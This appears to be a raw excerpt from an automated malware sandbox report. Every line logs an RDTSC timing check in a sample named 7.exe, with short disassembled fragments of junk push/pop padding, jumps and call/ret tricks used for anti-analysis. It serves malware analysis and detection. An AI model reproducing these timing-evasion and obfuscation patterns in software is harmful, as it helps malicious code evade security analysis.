Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D9E1 second address: E8D9E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E8D9E5 second address: E8D9EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E42BDE second address: E42C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FDB98EABA26h 0x0000000a jc 00007FDB98EABA3Ch 0x00000010 jmp 00007FDB98EABA36h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1C49B second address: E1C49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1C49F second address: E1C4A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E1C4A8 second address: E1C4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDB98EAF3CEh 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E92E0B second address: E92E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E92E0F second address: E92E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E92E1A second address: E92E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E92F70 second address: E92F74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E93376 second address: E9338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EABA2Eh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E9338F second address: E93393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E93393 second address: E933A8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FDB98EABA2Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E933A8 second address: E933B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E933B2 second address: E933B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E92B26 second address: E92B32 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FDB98EAF3CEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E984B9 second address: E984DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDB98EABA26h 0x00000008 jno 00007FDB98EABA26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FDB98EABA28h 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007FDB98EABA26h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E984DD second address: E984E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E984E1 second address: E984E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E984E9 second address: E984EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E987D2 second address: E987F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDB98EABA26h 0x0000000a pop ecx 0x0000000b push ecx 0x0000000c jmp 00007FDB98EABA31h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E987F0 second address: E98821 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3D5h 0x00000007 pushad 0x00000008 jmp 00007FDB98EAF3D5h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E9F5C0 second address: E9F5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E9F5CB second address: E9F5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E9F5DB second address: E9F603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FDB98EABA2Ah 0x0000000b push esi 0x0000000c pop esi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDB98EABA37h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E173C6 second address: E173CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E173CC second address: E173D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FDB98EABA26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E173D7 second address: E173DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E173DD second address: E173E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA2C67 second address: EA2C6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA2DA7 second address: EA2DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA2DAD second address: EA2DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA7902 second address: EA790C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDB98EABA26h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA790C second address: EA7922 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDB98EAF3C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FDB98EAF3C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA7922 second address: EA7926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAA7E5 second address: EAA7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F14 second address: EA9F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F1A second address: EA9F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F1E second address: EA9F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA35h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F39 second address: EA9F43 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EAF3CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F43 second address: EA9F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EABA38h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EA9F65 second address: EA9F95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FDB98EAF3D5h 0x0000000c jmp 00007FDB98EAF3D3h 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAA4EB second address: EAA4FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EABA2Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAA4FD second address: EAA514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDB98EAF3CDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAA514 second address: EAA518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE599 second address: EAE5A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE5A1 second address: EAE5CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDB98EABA2Bh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jbe 00007FDB98EABA26h 0x00000019 jnl 00007FDB98EABA26h 0x0000001f popad 0x00000020 push ecx 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE5CC second address: EAE5DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE8D1 second address: EAE8F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 jmp 00007FDB98EABA38h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE8F2 second address: EAE90A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDB98EAF3CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE90A second address: EAE90E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE90E second address: EAE91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAE91B second address: EAE920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAEB94 second address: EAEB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EAEB9A second address: EAEBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB46DD second address: EB46E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB32EE second address: EB32F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB36D6 second address: EB36EF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FDB98EAF3C6h 0x0000000b pop edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 jc 00007FDB98EAF3C6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B4D7 second address: E5B4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B4DB second address: E5B561 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnl 00007FDB98EAF3CAh 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FDB98EAF3C8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov ebx, dword ptr [ebp+1246F679h] 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007FDB98EAF3C8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 je 00007FDB98EAF3C8h 0x0000004f mov ecx, edi 0x00000051 jmp 00007FDB98EAF3D6h 0x00000056 add eax, ebx 0x00000058 mov edx, dword ptr [ebp+122D2D5Dh] 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B561 second address: E5B565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B565 second address: E5B577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EAF3CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: E5B577 second address: E5B5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FDB98EABA26h 0x00000009 jg 00007FDB98EABA26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007FDB98EABA31h 0x00000018 nop 0x00000019 mov edx, dword ptr [ebp+122D2C15h] 0x0000001f push 00000004h 0x00000021 mov edx, dword ptr [ebp+122D3A15h] 0x00000027 xor dword ptr [ebp+122D30C7h], eax 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FDB98EABA38h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB383A second address: EB3840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB3840 second address: EB385A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 je 00007FDB98EABA26h 0x0000000f jng 00007FDB98EABA26h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB385A second address: EB385E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB385E second address: EB3867 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB43D3 second address: EB43D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9C8B second address: EB9C9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9C9E second address: EB9CAE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDB98EAF3CAh 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9CAE second address: EB9CB8 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDB98EABA26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9F6E second address: EB9F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9F74 second address: EB9F83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 ja 00007FDB98EABA26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EB9F83 second address: EB9F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EBA893 second address: EBA89D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDB98EABA26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EBAB95 second address: EBABA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EBB459 second address: EBB45F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EBB45F second address: EBB464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC0727 second address: EC072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC072B second address: EC0731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC0731 second address: EC074C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDB98EABA2Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC074C second address: EC0768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC0768 second address: EC078A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA34h 0x00000007 jng 00007FDB98EABA26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC078A second address: EC079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDB98EAF3CDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC079B second address: EC07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC40F7 second address: EC4112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDB98EAF3D5h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4112 second address: EC4116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4116 second address: EC4125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4125 second address: EC4151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDB98EABA32h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDB98EABA2Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4151 second address: EC4155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4155 second address: EC4159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC4159 second address: EC4165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FDB98EAF3C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\7.exe	RDTSC instruction interceptor: First address: EC347A second address: EC348D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDB98EABA2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
